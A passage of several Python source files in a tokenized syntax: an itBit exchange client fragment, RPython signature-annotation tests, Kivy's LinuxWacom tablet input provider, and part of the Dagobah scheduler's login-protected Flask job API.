case, no response is given but we need to call resp() so it # can catch any error cases. <block_start>response=self.resp(req)# noqa <return>{'success':<true>}<block_end><def_stmt>withdraw_crypto_req self address volume<block_start><if_stmt><not>isinstance(address basestring)<block_start><raise>TypeError('Withdrawal address must be a string')<block_end><if_stmt><not>isinstance(volume Money)<or>volume.currency<ne>self.volume_currency<block_start><raise>TypeError('Withdrawal volume must be in %s'%self.volume_currency)<block_end>volume_str='%.8f'%volume.amount<line_sep>payload={'currency':'XBT' 'amount':volume_str 'address':address }<line_sep><return>self.req('post' '/wallets/%s/cryptocurrency_withdrawals'%self.wallet_id data=payload )<block_end><def_stmt>withdraw_crypto_resp self req<block_start>response=self.resp(req)<line_sep><return>{'success':<true> 'exchange_withdrawal_id':response['withdrawalId']}<block_end><def_stmt>get_order_audit_data self skip_recent=0 page=1<block_start>""" Returns an OrderedDict of order ids mapped to their filled volume (only include orders that have some trades). Dropped the skip_recent flag because we don't seem to be using it anywhere. """<if_stmt>skip_recent<ne>0<block_start><raise>ValueEror('skip_recent is deprecated')<block_end>orders=OrderedDict()<line_sep>trades_to_audit=self.all_trades(page=page)<for_stmt>trade trades_to_audit<block_start>order_id=str(trade['orderId'])<assert_stmt>(trade['currency1']<eq>'XBT')<line_sep>trade_amount=abs(Money(trade['currency1Amount'] 'BTC'))<try_stmt><block_start>orders[order_id]<augadd>trade_amount<block_end><except_stmt>KeyError<block_start>orders[order_id]=trade_amount<block_end><block_end># Remove the oldest 2 orders, because its trades might be wrapped around a # page gap and this would give us an innacurate volume_filled number. # We need to remove 2 because there could be an ask and a bid. <try_stmt><block_start>orders.popitem()<line_sep>orders.popitem()<block_end><except_stmt>KeyError<block_start><pass><block_end><return>orders<block_end><def_stmt>fiat_deposit_fee self deposit_amount<block_start><return>Money('5' 'USD')<block_end><def_stmt>fiat_withdrawal_fee self withdrawal_amount<block_start>""" Itbit fee is from their documentation, and an extra $15 is being charged to us before it shows up in our bank account (as of the September 2016), so I assume that's an intermediary fee. The fee should be a flat $50 on withdrawals > $10k, but we'll see. """<line_sep>fee=Money('0' 'USD')<if_stmt>withdrawal_amount<l>Money('10,000' 'USD')<block_start>itbit_fee=Money('15' 'USD')<line_sep>intermediary_fee=Money('15' 'USD')<line_sep>fee=itbit_fee+intermediary_fee<block_end><else_stmt><block_start>fee=Money('50' 'USD')<block_end><return>fee<block_end><block_end>
<import_stmt>py<import_from_stmt>rpython.rlib.signature signature finishsigs FieldSpec ClassSpec<import_from_stmt>rpython.rlib types<import_from_stmt>rpython.annotator model<import_from_stmt>rpython.rtyper.llannotation SomePtr<import_from_stmt>rpython.annotator.signature SignatureError<import_from_stmt>rpython.translator.translator TranslationContext graphof<import_from_stmt>rpython.rtyper.lltypesystem rstr<import_from_stmt>rpython.rtyper.annlowlevel LowLevelAnnotatorPolicy<def_stmt>annotate_at f policy=<none><block_start>t=TranslationContext()<line_sep>t.config.translation.check_str_without_nul=<true><line_sep>a=t.buildannotator(policy=policy)<line_sep>a.annotate_helper(f [model.s_ImpossibleValue]<times>f.__code__.co_argcount policy=policy)<line_sep><return>a<block_end><def_stmt>sigof a f# returns [param1, param2, ..., ret] <block_start>g=graphof(a.translator f)<line_sep><return>[a.binding(v)<for>v g.startblock.inputargs]+[a.binding(g.getreturnvar())]<block_end><def_stmt>getsig f policy=<none><block_start>a=annotate_at(f policy=policy)<line_sep><return>sigof(a f)<block_end><def_stmt>check_annotator_fails caller<block_start>exc=py.test.raises(model.AnnotatorError annotate_at caller).value<assert_stmt>caller.__name__<in>str(exc)<block_end><def_stmt>test_bookkeeping <block_start>@signature('x' 'y' returns='z')<def_stmt>f a b<block_start><return>a+len(b)<block_end>f.foo='foo'<assert_stmt>f._signature_<eq>(('x' 'y') 'z')<assert_stmt>f.__name__<eq>'f'<assert_stmt>f.foo<eq>'foo'<assert_stmt>f(1 'hello')<eq>6<block_end><def_stmt>test_basic <block_start>@signature(types.int() types.str() returns=types.char())<def_stmt>f a b<block_start><return>b[a]<block_end><assert_stmt>getsig(f)<eq>[model.SomeInteger() model.SomeString() model.SomeChar()]<block_end><def_stmt>test_arg_errors <block_start>@signature(types.int() types.str() returns=types.int())<def_stmt>f a b<block_start><return>a+len(b)<block_end>@check_annotator_fails<def_stmt>ok_for_body # would give no error without signature <block_start>f(2.0 'b')<block_end>@check_annotator_fails<def_stmt>bad_for_body # would give error inside 'f' body, instead errors at call <block_start>f('a' 'b')<block_end><block_end><def_stmt>test_return <block_start>@signature(returns=types.str())<def_stmt>f <block_start><return>'a'<block_end><assert_stmt>getsig(f)<eq>[model.SomeString()]<line_sep>@signature(types.str() returns=types.str())<def_stmt>f x<block_start><return>x<block_end><def_stmt>g <block_start><return>f('a')<block_end>a=annotate_at(g)<assert_stmt>sigof(a f)<eq>[model.SomeString() model.SomeString()]<block_end><def_stmt>test_return_errors <block_start>@check_annotator_fails@signature(returns=types.int())<def_stmt>int_not_char <block_start><return>'a'<block_end>@check_annotator_fails@signature(types.str() returns=types.int())<def_stmt>str_to_int s<block_start><return>s<block_end>@signature(returns=types.str())<def_stmt>str_not_None <block_start><return><none><block_end>@check_annotator_fails<def_stmt>caller_of_str_not_None <block_start><return>str_not_None()<block_end><block_end>@py.test.mark.xfail<def_stmt>test_return_errors_xfail <block_start>@check_annotator_fails@signature(returns=types.str())<def_stmt>str_not_None <block_start><return><none><block_end><block_end><def_stmt>test_none <block_start>@signature(returns=types.none())<def_stmt>f <block_start><pass><block_end><assert_stmt>getsig(f)<eq>[model.s_None]<block_end><def_stmt>test_float <block_start>@signature(types.longfloat() types.singlefloat() returns=types.float())<def_stmt>f a b<block_start><return>3.0<block_end><assert_stmt>getsig(f)<eq>[model.SomeLongFloat() model.SomeSingleFloat() model.SomeFloat()]<block_end><def_stmt>test_unicode <block_start>@signature(types.unicode() returns=types.int())<def_stmt>f u<block_start><return>len(u)<block_end><assert_stmt>getsig(f)<eq>[model.SomeUnicodeString() model.SomeInteger()]<block_end><def_stmt>test_str0 <block_start>@signature(types.unicode0() returns=types.str0())<def_stmt>f u<block_start><return>'str'<block_end><assert_stmt>getsig(f)<eq>[model.SomeUnicodeString(no_nul=<true>) model.SomeString(no_nul=<true>)]<block_end><def_stmt>test_ptr <block_start>policy=LowLevelAnnotatorPolicy()<line_sep>@signature(types.ptr(rstr.STR) returns=types.none())<def_stmt>f buf<block_start><pass><block_end>argtype=getsig(f policy=policy)[0]<assert_stmt>isinstance(argtype SomePtr)<assert_stmt>argtype.ll_ptrtype.TO<eq>rstr.STR<def_stmt>g <block_start>f(rstr.mallocstr(10))<block_end>getsig(g policy=policy)<block_end><def_stmt>test_list <block_start>@signature(types.list(types.int()) returns=types.int())<def_stmt>f a<block_start><return>len(a)<block_end>argtype=getsig(f)[0]<assert_stmt>isinstance(argtype model.SomeList)<line_sep>item=argtype.listdef.listitem<assert_stmt>item.s_value<eq>model.SomeInteger()<assert_stmt>item.resized<eq><true><line_sep>@check_annotator_fails<def_stmt>ok_for_body <block_start>f(['a'])<block_end>@check_annotator_fails<def_stmt>bad_for_body <block_start>f('a')<block_end>@signature(returns=types.list(types.char()))<def_stmt>ff <block_start><return>['a']<block_end>@check_annotator_fails<def_stmt>mutate_broader <block_start>ff()[0]='abc'<block_end>@check_annotator_fails<def_stmt>mutate_unrelated <block_start>ff()[0]=1<block_end>@check_annotator_fails@signature(types.list(types.char()) returns=types.int())<def_stmt>mutate_in_body l<block_start>l[0]='abc'<line_sep><return>len(l)<block_end><def_stmt>can_append <block_start>l=ff()<line_sep>l.append('b')<block_end>getsig(can_append)<block_end><def_stmt>test_array <block_start>@signature(returns=types.array(types.int()))<def_stmt>f <block_start><return>[1]<block_end>rettype=getsig(f)[0]<assert_stmt>isinstance(rettype model.SomeList)<line_sep>item=rettype.listdef.listitem<assert_stmt>item.s_value<eq>model.SomeInteger()<assert_stmt>item.resized<eq><false><def_stmt>try_append <block_start>l=f()<line_sep>l.append(2)<block_end>check_annotator_fails(try_append)<block_end><def_stmt>test_dict <block_start>@signature(returns=types.dict(types.str() types.int()))<def_stmt>f <block_start><return>{'a':1 'b':2}<block_end>rettype=getsig(f)[0]<assert_stmt>isinstance(rettype model.SomeDict)<assert_stmt>rettype.dictdef.dictkey.s_value<eq>model.SomeString()<assert_stmt>rettype.dictdef.dictvalue.s_value<eq>model.SomeInteger()<block_end><def_stmt>test_instance <block_start><class_stmt>C1(object)<block_start><pass><block_end><class_stmt>C2(C1)<block_start><pass><block_end><class_stmt>C3(C2)<block_start><pass><block_end>@signature(types.instance(C3) returns=types.instance(C2))<def_stmt>f x<block_start><assert_stmt>isinstance(x C2)<line_sep><return>x<block_end>argtype,rettype=getsig(f)<assert_stmt>isinstance(argtype model.SomeInstance)<assert_stmt>argtype.classdef.classdesc.pyobj<eq>C3<assert_stmt>isinstance(rettype model.SomeInstance)<assert_stmt>rettype.classdef.classdesc.pyobj<eq>C2<line_sep>@check_annotator_fails<def_stmt>ok_for_body <block_start>f(C2())<block_end>@check_annotator_fails<def_stmt>bad_for_body <block_start>f(C1())<block_end>@check_annotator_fails<def_stmt>ok_for_body <block_start>f(<none>)<block_end><block_end><def_stmt>test_instance_or_none <block_start><class_stmt>C1(object)<block_start><pass><block_end><class_stmt>C2(C1)<block_start><pass><block_end><class_stmt>C3(C2)<block_start><pass><block_end>@signature(types.instance(C3 can_be_None=<true>) returns=types.instance(C2 can_be_None=<true>))<def_stmt>f x<block_start><assert_stmt>isinstance(x C2)<or>x<is><none><line_sep><return>x<block_end>argtype,rettype=getsig(f)<assert_stmt>isinstance(argtype model.SomeInstance)<assert_stmt>argtype.classdef.classdesc.pyobj<eq>C3<assert_stmt>argtype.can_be_None<assert_stmt>isinstance(rettype model.SomeInstance)<assert_stmt>rettype.classdef.classdesc.pyobj<eq>C2<assert_stmt>rettype.can_be_None<line_sep>@check_annotator_fails<def_stmt>ok_for_body <block_start>f(C2())<block_end>@check_annotator_fails<def_stmt>bad_for_body <block_start>f(C1())<block_end><block_end><def_stmt>test_self <block_start>@finishsigs<class_stmt>C(object)<block_start>@signature(types.self() types.self() returns=types.none())<def_stmt>f self other<block_start><pass><block_end><block_end><class_stmt>D1(C)<block_start><pass><block_end><class_stmt>D2(C)<block_start><pass><block_end><def_stmt>g <block_start>D1().f(D2())<block_end>a=annotate_at(g)<line_sep>argtype=sigof(a C.__dict__['f'])[0]<assert_stmt>isinstance(argtype model.SomeInstance)<assert_stmt>argtype.classdef.classdesc.pyobj<eq>C<block_end><def_stmt>test_self_error <block_start><class_stmt>C(object)<block_start>@signature(types.self() returns=types.none())<def_stmt>incomplete_sig_meth self<block_start><pass><block_end><block_end>exc=py.test.raises(SignatureError annotate_at C.incomplete_sig_meth).value<assert_stmt>'incomplete_sig_meth'<in>str(exc)<assert_stmt>'finishsigs'<in>str(exc)<block_end><def_stmt>test_any_as_argument <block_start>@signature(types.any() types.int() returns=types.float())<def_stmt>f x y<block_start><return>x+y<block_end>@signature(types.int() returns=types.float())<def_stmt>g x<block_start><return>f(x x)<block_end>sig=getsig(g)<assert_stmt>sig<eq>[model.SomeInteger() model.SomeFloat()]<line_sep>@signature(types.float() returns=types.float())<def_stmt>g x<block_start><return>f(x 4)<block_end>sig=getsig(g)<assert_stmt>sig<eq>[model.SomeFloat() model.SomeFloat()]<line_sep>@signature(types.str() returns=types.int())<def_stmt>cannot_add_string x<block_start><return>f(x 2)<block_end>exc=py.test.raises(model.AnnotatorError annotate_at cannot_add_string).value<assert_stmt>'Blocked block'<in>str(exc)<block_end><def_stmt>test_return_any <block_start>@signature(types.int() returns=types.any())<def_stmt>f x<block_start><return>x<block_end>sig=getsig(f)<assert_stmt>sig<eq>[model.SomeInteger() model.SomeInteger()]<line_sep>@signature(types.str() returns=types.any())<def_stmt>cannot_add_string x<block_start><return>f(3)+x<block_end>exc=py.test.raises(model.AnnotatorError annotate_at cannot_add_string).value<assert_stmt>'Blocked block'<in>str(exc)<assert_stmt>'cannot_add_string'<in>str(exc)<block_end>@py.test.mark.xfail<def_stmt>test_class_basic <block_start><class_stmt>C(object)<block_start>_fields_=ClassSpec({'x':FieldSpec(types.int)})<block_end><def_stmt>wrong_type <block_start>c=C()<line_sep>c.x='a'<block_end>check_annotator_fails(wrong_type)<def_stmt>bad_field <block_start>c=C()<line_sep>c.y=3<block_end>check_annotator_fails(bad_field)<block_end>@py.test.mark.xfail<def_stmt>test_class_shorthand <block_start><class_stmt>C1(object)<block_start>_fields_={'x':FieldSpec(types.int)}<block_end><def_stmt>wrong_type_1 <block_start>c=C1()<line_sep>c.x='a'<block_end>check_annotator_fails(wrong_type_1)<class_stmt>C2(object)<block_start>_fields_=ClassSpec({'x':types.int})<block_end><def_stmt>wrong_type_2 <block_start>c=C2()<line_sep>c.x='a'<block_end>check_annotator_fails(wrong_type_1)<block_end>@py.test.mark.xfail<def_stmt>test_class_inherit <block_start><class_stmt>C(object)<block_start>_fields_=ClassSpec({'x':FieldSpec(types.int)})<block_end><class_stmt>C1(object)<block_start>_fields_=ClassSpec({'y':FieldSpec(types.int)})<block_end><class_stmt>C2(object)<block_start>_fields_=ClassSpec({'y':FieldSpec(types.int)} inherit=<true>)<block_end><def_stmt>no_inherit <block_start>c=C1()<line_sep>c.x=3<block_end>check_annotator_fails(no_inherit)<def_stmt>good <block_start>c=C2()<line_sep>c.x=3<block_end>annotate_at(good)<def_stmt>wrong_type <block_start>c=C2()<line_sep>c.x='a'<block_end>check_annotator_fails(wrong_type)<block_end>
''' Native support of Wacom tablet from linuxwacom driver ===================================================== To configure LinuxWacom, add this to your configuration:: [input] pen = linuxwacom,/dev/input/event2,mode=pen finger = linuxwacom,/dev/input/event3,mode=touch .. note:: You must have read access to the input event. You can use a custom range for the X, Y and pressure values. On some drivers, the range reported is invalid. To fix that, you can add these options to the argument line: * invert_x : 1 to invert X axis * invert_y : 1 to invert Y axis * min_position_x : X minimum * max_position_x : X maximum * min_position_y : Y minimum * max_position_y : Y maximum * min_pressure : pressure minimum * max_pressure : pressure maximum '''<line_sep>__all__=('LinuxWacomMotionEventProvider' 'LinuxWacomMotionEvent')<import_stmt>os<import_from_stmt>kivy.input.motionevent MotionEvent<import_from_stmt>kivy.input.shape ShapeRect<class_stmt>LinuxWacomMotionEvent(MotionEvent)<block_start><def_stmt>depack self args<block_start>self.is_touch=<true><line_sep>self.sx=args['x']<line_sep>self.sy=args['y']<line_sep>self.profile=['pos']<if_stmt>'size_w'<in>args<and>'size_h'<in>args<block_start>self.shape=ShapeRect()<line_sep>self.shape.width=args['size_w']<line_sep>self.shape.height=args['size_h']<line_sep>self.profile.append('shape')<block_end><if_stmt>'pressure'<in>args<block_start>self.pressure=args['pressure']<line_sep>self.profile.append('pressure')<block_end>super(LinuxWacomMotionEvent self).depack(args)<block_end><def_stmt>__str__ self<block_start><return>'<LinuxWacomMotionEvent id=%d pos=(%f, %f) device=%s>'%(self.id self.sx self.sy self.device)<block_end><block_end><if_stmt>'KIVY_DOC'<in>os.environ# documentation hack <block_start>LinuxWacomMotionEventProvider=<none><block_end><else_stmt><block_start><import_stmt>threading<import_stmt>collections<import_stmt>struct<import_stmt>fcntl<import_from_stmt>kivy.input.provider MotionEventProvider<import_from_stmt>kivy.input.factory MotionEventFactory<import_from_stmt>kivy.logger Logger<line_sep># # This part is taken from linux-source-2.6.32/include/linux/input.h # # Event types EV_SYN=0x00<line_sep>EV_KEY=0x01<line_sep>EV_REL=0x02<line_sep>EV_ABS=0x03<line_sep>EV_MSC=0x04<line_sep>EV_SW=0x05<line_sep>EV_LED=0x11<line_sep>EV_SND=0x12<line_sep>EV_REP=0x14<line_sep>EV_FF=0x15<line_sep>EV_PWR=0x16<line_sep>EV_FF_STATUS=0x17<line_sep>EV_MAX=0x1f<line_sep>EV_CNT=(EV_MAX+1)<line_sep>KEY_MAX=0x2ff<line_sep># Synchronization events SYN_REPORT=0<line_sep>SYN_CONFIG=1<line_sep>SYN_MT_REPORT=2<line_sep># Misc events MSC_SERIAL=0x00<line_sep>MSC_PULSELED=0x01<line_sep>MSC_GESTURE=0x02<line_sep>MSC_RAW=0x03<line_sep>MSC_SCAN=0x04<line_sep>MSC_MAX=0x07<line_sep>MSC_CNT=(MSC_MAX+1)<line_sep>ABS_X=0x00<line_sep>ABS_Y=0x01<line_sep>ABS_PRESSURE=0x18<line_sep>ABS_MISC=0x28# if 0, it's touch up ABS_MT_TOUCH_MAJOR=0x30# Major axis of touching ellipse ABS_MT_TOUCH_MINOR=0x31# Minor axis (omit if circular) ABS_MT_WIDTH_MAJOR=0x32# Major axis of approaching ellipse ABS_MT_WIDTH_MINOR=0x33# Minor axis (omit if circular) ABS_MT_ORIENTATION=0x34# Ellipse orientation ABS_MT_POSITION_X=0x35# Center X ellipse position ABS_MT_POSITION_Y=0x36# Center Y ellipse position ABS_MT_TOOL_TYPE=0x37# Type of touching device ABS_MT_BLOB_ID=0x38# Group a set of packets as a blob ABS_MT_TRACKING_ID=0x39# Unique ID of initiated contact ABS_MT_PRESSURE=0x3a# Pressure on contact area # some ioctl base (with 0 value) EVIOCGNAME=2147501318<line_sep>EVIOCGBIT=2147501344<line_sep>EVIOCGABS=2149074240<line_sep># sizeof(struct input_event) struct_input_event_sz=struct.calcsize('LLHHi')<line_sep>struct_input_absinfo_sz=struct.calcsize('iiiiii')<line_sep>sz_l=struct.calcsize('Q')<class_stmt>LinuxWacomMotionEventProvider(MotionEventProvider)<block_start>options=('min_position_x' 'max_position_x' 'min_position_y' 'max_position_y' 'min_pressure' 'max_pressure' 'invert_x' 'invert_y')<def_stmt>__init__ self device args<block_start>super(LinuxWacomMotionEventProvider self).__init__(device args)<line_sep>self.input_fn=<none><line_sep>self.default_ranges=dict()<line_sep>self.mode='touch'<line_sep># split arguments args=args.split(',')<if_stmt><not>args<block_start>Logger.error('LinuxWacom: No filename given in config')<line_sep>Logger.error('LinuxWacom: Use /dev/input/event0 for example')<line_sep><return><block_end># read filename self.input_fn=args[0]<line_sep>Logger.info('LinuxWacom: Read event from <%s>'%self.input_fn)<line_sep># read parameters <for_stmt>arg args[1:]<block_start><if_stmt>arg<eq>''<block_start><continue><block_end>arg=arg.split('=')<line_sep># ensure it's a key = value <if_stmt>len(arg)<ne>2<block_start>err='LinuxWacom: Bad parameter'<concat>'%s: Not in key=value format.'%arg<line_sep>Logger.error(err)<line_sep><continue><block_end># ensure the key exist key,value=arg<if_stmt>key<eq>'mode'<block_start>self.mode=value<line_sep><continue><block_end><if_stmt>key<not><in>LinuxWacomMotionEventProvider.options<block_start>Logger.error('LinuxWacom: unknown %s option'%key)<line_sep><continue><block_end># ensure the value <try_stmt><block_start>self.default_ranges[key]=int(value)<block_end><except_stmt>ValueError<block_start>err='LinuxWacom: value %s invalid for %s'%(key value)<line_sep>Logger.error(err)<line_sep><continue><block_end># all good! msg='LinuxWacom: Set custom %s to %d'%(key int(value))<line_sep>Logger.info(msg)<block_end>Logger.info('LinuxWacom: mode is <%s>'%self.mode)<block_end><def_stmt>start self<block_start><if_stmt>self.input_fn<is><none><block_start><return><block_end>self.uid=0<line_sep>self.queue=collections.deque()<line_sep>self.thread=threading.Thread(target=self._thread_run kwargs=dict(queue=self.queue input_fn=self.input_fn device=self.device default_ranges=self.default_ranges))<line_sep>self.thread.daemon=<true><line_sep>self.thread.start()<block_end><def_stmt>_thread_run self **kwargs<block_start>input_fn=kwargs.get('input_fn')<line_sep>queue=kwargs.get('queue')<line_sep>device=kwargs.get('device')<line_sep>drs=kwargs.get('default_ranges').get<line_sep>touches={}<line_sep>touches_sent=[]<line_sep>l_points={}<line_sep># prepare some vars to get limit of some component range_min_position_x=0<line_sep>range_max_position_x=2048<line_sep>range_min_position_y=0<line_sep>range_max_position_y=2048<line_sep>range_min_pressure=0<line_sep>range_max_pressure=255<line_sep>invert_x=int(bool(drs('invert_x' 0)))<line_sep>invert_y=int(bool(drs('invert_y' 0)))<line_sep>reset_touch=<false><def_stmt>process points<block_start>actives=list(points.keys())<for_stmt>args points.values()<block_start>tid=args['id']<try_stmt><block_start>touch=touches[tid]<block_end><except_stmt>KeyError<block_start>touch=LinuxWacomMotionEvent(device tid args)<line_sep>touches[touch.id]=touch<block_end><if_stmt>touch.sx<eq>args['x']<and>touch.sy<eq>args['y']<and>tid<in>touches_sent<block_start><continue><block_end>touch.move(args)<if_stmt>tid<not><in>touches_sent<block_start>queue.append(('begin' touch))<line_sep>touches_sent.append(tid)<block_end>queue.append(('update' touch))<block_end><for_stmt>tid list(touches.keys())[:]<block_start><if_stmt>tid<not><in>actives<block_start>touch=touches[tid]<if_stmt>tid<in>touches_sent<block_start>touch.update_time_end()<line_sep>queue.append(('end' touch))<line_sep>touches_sent.remove(tid)<block_end><del_stmt>touches[tid]<block_end><block_end><block_end><def_stmt>normalize value vmin vmax<block_start><return>(value-vmin)/float(vmax-vmin)<block_end># open the input <try_stmt><block_start>fd=open(input_fn 'rb')<block_end><except_stmt>IOError<block_start>Logger.exception('Unable to open %s'%input_fn)<line_sep><return><block_end># get the controller name (EVIOCGNAME) device_name=fcntl.ioctl(fd EVIOCGNAME+(256<lshift>16) " "<times>256).split('\x00')[0]<line_sep>Logger.info('LinuxWacom: using <%s>'%device_name)<line_sep># get abs infos bit=fcntl.ioctl(fd EVIOCGBIT+(EV_MAX<lshift>16) ' '<times>sz_l)<line_sep>bit,=struct.unpack('Q' bit)<for_stmt>x range(EV_MAX)# preserve this, we may want other things than EV_ABS <block_start><if_stmt>x<ne>EV_ABS<block_start><continue><block_end># EV_ABS available for this device ? <if_stmt>(bit&(1<lshift>x))<eq>0<block_start><continue><block_end># ask abs info keys to the devices sbit=fcntl.ioctl(fd EVIOCGBIT+x+(KEY_MAX<lshift>16) ' '<times>sz_l)<line_sep>sbit,=struct.unpack('Q' sbit)<for_stmt>y range(KEY_MAX)<block_start><if_stmt>(sbit&(1<lshift>y))<eq>0<block_start><continue><block_end>absinfo=fcntl.ioctl(fd EVIOCGABS+y+(struct_input_absinfo_sz<lshift>16) ' '<times>struct_input_absinfo_sz)<line_sep>abs_value,abs_min,abs_max,abs_fuzz,abs_flat,abs_res=struct.unpack('iiiiii' absinfo)<if_stmt>y<eq>ABS_X<block_start>range_min_position_x=drs('min_position_x' abs_min)<line_sep>range_max_position_x=drs('max_position_x' abs_max)<line_sep>Logger.info('LinuxWacom: '+'<%s> range position X is %d - %d'%(device_name abs_min abs_max))<block_end><elif_stmt>y<eq>ABS_Y<block_start>range_min_position_y=drs('min_position_y' abs_min)<line_sep>range_max_position_y=drs('max_position_y' abs_max)<line_sep>Logger.info('LinuxWacom: '+'<%s> range position Y is %d - %d'%(device_name abs_min abs_max))<block_end><elif_stmt>y<eq>ABS_PRESSURE<block_start>range_min_pressure=drs('min_pressure' abs_min)<line_sep>range_max_pressure=drs('max_pressure' abs_max)<line_sep>Logger.info('LinuxWacom: '+'<%s> range pressure is %d - %d'%(device_name abs_min abs_max))<block_end><block_end><block_end># read until the end changed=<false><line_sep>touch_id=0<line_sep>touch_x=0<line_sep>touch_y=0<line_sep>touch_pressure=0<while_stmt>fd<block_start>data=fd.read(struct_input_event_sz)<if_stmt>len(data)<l>struct_input_event_sz<block_start><break><block_end># extract each event <for_stmt>i range(len(data)/struct_input_event_sz)<block_start>ev=data[i<times>struct_input_event_sz:]<line_sep># extract timeval + event infos tv_sec,tv_usec,ev_type,ev_code,ev_value=struct.unpack('LLHHi' ev[:struct_input_event_sz])<if_stmt>ev_type<eq>EV_SYN<and>ev_code<eq>SYN_REPORT<block_start><if_stmt>touch_id<in>l_points<block_start>p=l_points[touch_id]<block_end><else_stmt><block_start>p=dict()<line_sep>l_points[touch_id]=p<block_end>p['id']=touch_id<if_stmt><not>reset_touch<block_start>p['x']=touch_x<line_sep>p['y']=touch_y<line_sep>p['pressure']=touch_pressure<block_end><if_stmt>self.mode<eq>'pen'<and>touch_pressure<eq>0<and><not>reset_touch<block_start><del_stmt>l_points[touch_id]<block_end><if_stmt>changed<block_start><if_stmt>'x'<not><in>p<block_start>reset_touch=<false><line_sep><continue><block_end>process(l_points)<line_sep>changed=<false><block_end><if_stmt>reset_touch<block_start>l_points.clear()<line_sep>reset_touch=<false><line_sep>process(l_points)<block_end><block_end><elif_stmt>ev_type<eq>EV_MSC<and>ev_code<eq>MSC_SERIAL<block_start>touch_id=ev_value<block_end><elif_stmt>ev_type<eq>EV_ABS<and>ev_code<eq>ABS_X<block_start>val=normalize(ev_value range_min_position_x range_max_position_x)<if_stmt>invert_x<block_start>val=1.-val<block_end>touch_x=val<line_sep>changed=<true><block_end><elif_stmt>ev_type<eq>EV_ABS<and>ev_code<eq>ABS_Y<block_start>val=1.-normalize(ev_value range_min_position_y range_max_position_y)<if_stmt>invert_y<block_start>val=1.-val<block_end>touch_y=val<line_sep>changed=<true><block_end><elif_stmt>ev_type<eq>EV_ABS<and>ev_code<eq>ABS_PRESSURE<block_start>touch_pressure=normalize(ev_value range_min_pressure range_max_pressure)<line_sep>changed=<true><block_end><elif_stmt>ev_type<eq>EV_ABS<and>ev_code<eq>ABS_MISC<block_start><if_stmt>ev_value<eq>0<block_start>reset_touch=<true><block_end><block_end><block_end><block_end><block_end><def_stmt>update self dispatch_fn# dispatch all event from threads <block_start><try_stmt><block_start><while_stmt><true><block_start>event_type,touch=self.queue.popleft()<line_sep>dispatch_fn(event_type touch)<block_end><block_end><except_stmt><block_start><pass><block_end><block_end><block_end>MotionEventFactory.register('linuxwacom' LinuxWacomMotionEventProvider)<block_end>
""" HTTP API methods for Dagobah daemon. """<import_stmt>StringIO<import_stmt>json<import_from_stmt>flask request abort send_file<import_from_stmt>flask_login login_required<import_from_stmt>.daemon app<import_from_stmt>.util validate_dict api_call allowed_file<line_sep>dagobah=app.config['dagobah']<line_sep>@app.route('/api/jobs' methods=['GET'])@login_required@api_call<def_stmt>get_jobs <block_start><return>dagobah._serialize().get('jobs' {})<block_end>@app.route('/api/job' methods=['GET'])@login_required@api_call<def_stmt>get_job <block_start>args=dict(request.args)<if_stmt><not>validate_dict(args required=['job_name'] job_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<if_stmt><not>job<block_start>abort(400)<block_end><return>job._serialize()<block_end>@app.route('/api/logs' methods=['GET'])@login_required@api_call<def_stmt>get_run_log_history <block_start>args=dict(request.args)<if_stmt><not>validate_dict(args required=['job_name' 'task_name'] job_name=str task_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>task=job.tasks.get(args['task_name'] <none>)<if_stmt><not>task<block_start>abort(400)<block_end><return>task.get_run_log_history()<block_end>@app.route('/api/log' methods=['GET'])@login_required@api_call<def_stmt>get_log <block_start>args=dict(request.args)<if_stmt><not>validate_dict(args required=['job_name' 'task_name' 'log_id'] job_name=str task_name=str log_id=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>task=job.tasks.get(args['task_name'] <none>)<if_stmt><not>task<block_start>abort(400)<block_end><return>task.get_run_log(args['log_id'])<block_end>@app.route('/api/head' methods=['GET'])@login_required@api_call<def_stmt>head_task <block_start>args=dict(request.args)<if_stmt><not>validate_dict(args required=['job_name' 'task_name'] job_name=str task_name=str stream=str num_lines=int)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>task=job.tasks.get(args['task_name'] <none>)<if_stmt><not>task<block_start>abort(400)<block_end>call_args={}<for_stmt>key ['stream' 'num_lines']<block_start><if_stmt>key<in>args<block_start>call_args[key]=args[key]<block_end><block_end><return>task.head(**call_args)<block_end>@app.route('/api/tail' methods=['GET'])@login_required@api_call<def_stmt>tail_task <block_start>args=dict(request.args)<if_stmt><not>validate_dict(args required=['job_name' 'task_name'] job_name=str task_name=str stream=str num_lines=int)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>task=job.tasks.get(args['task_name'] <none>)<if_stmt><not>task<block_start>abort(400)<block_end>call_args={}<for_stmt>key ['stream' 'num_lines']<block_start><if_stmt>key<in>args<block_start>call_args[key]=args[key]<block_end><block_end><return>task.tail(**call_args)<block_end>@app.route('/api/add_job' methods=['POST'])@login_required@api_call<def_stmt>add_job <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name'] job_name=str)<block_start>abort(400)<block_end>dagobah.add_job(args['job_name'])<block_end>@app.route('/api/delete_job' methods=['POST'])@login_required@api_call<def_stmt>delete_job <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name'] job_name=str)<block_start>abort(400)<block_end>dagobah.delete_job(args['job_name'])<block_end>@app.route('/api/start_job' methods=['POST'])@login_required@api_call<def_stmt>start_job <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name'] job_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>job.start()<block_end>@app.route('/api/retry_job' methods=['POST'])@login_required@api_call<def_stmt>retry_job <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name'] job_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>job.retry()<block_end>@app.route('/api/add_task_to_job' methods=['POST'])@login_required@api_call<def_stmt>add_task_to_job <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'task_command' 'task_name'] job_name=str task_command=str task_name=str task_target=str)<block_start>abort(400)<block_end>dagobah.add_task_to_job(args['job_name'] args['task_command'] args['task_name'] hostname=args.get("task_target" <none>))<block_end>@app.route('/api/delete_task' methods=['POST'])@login_required@api_call<def_stmt>delete_task <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'task_name'] job_name=str 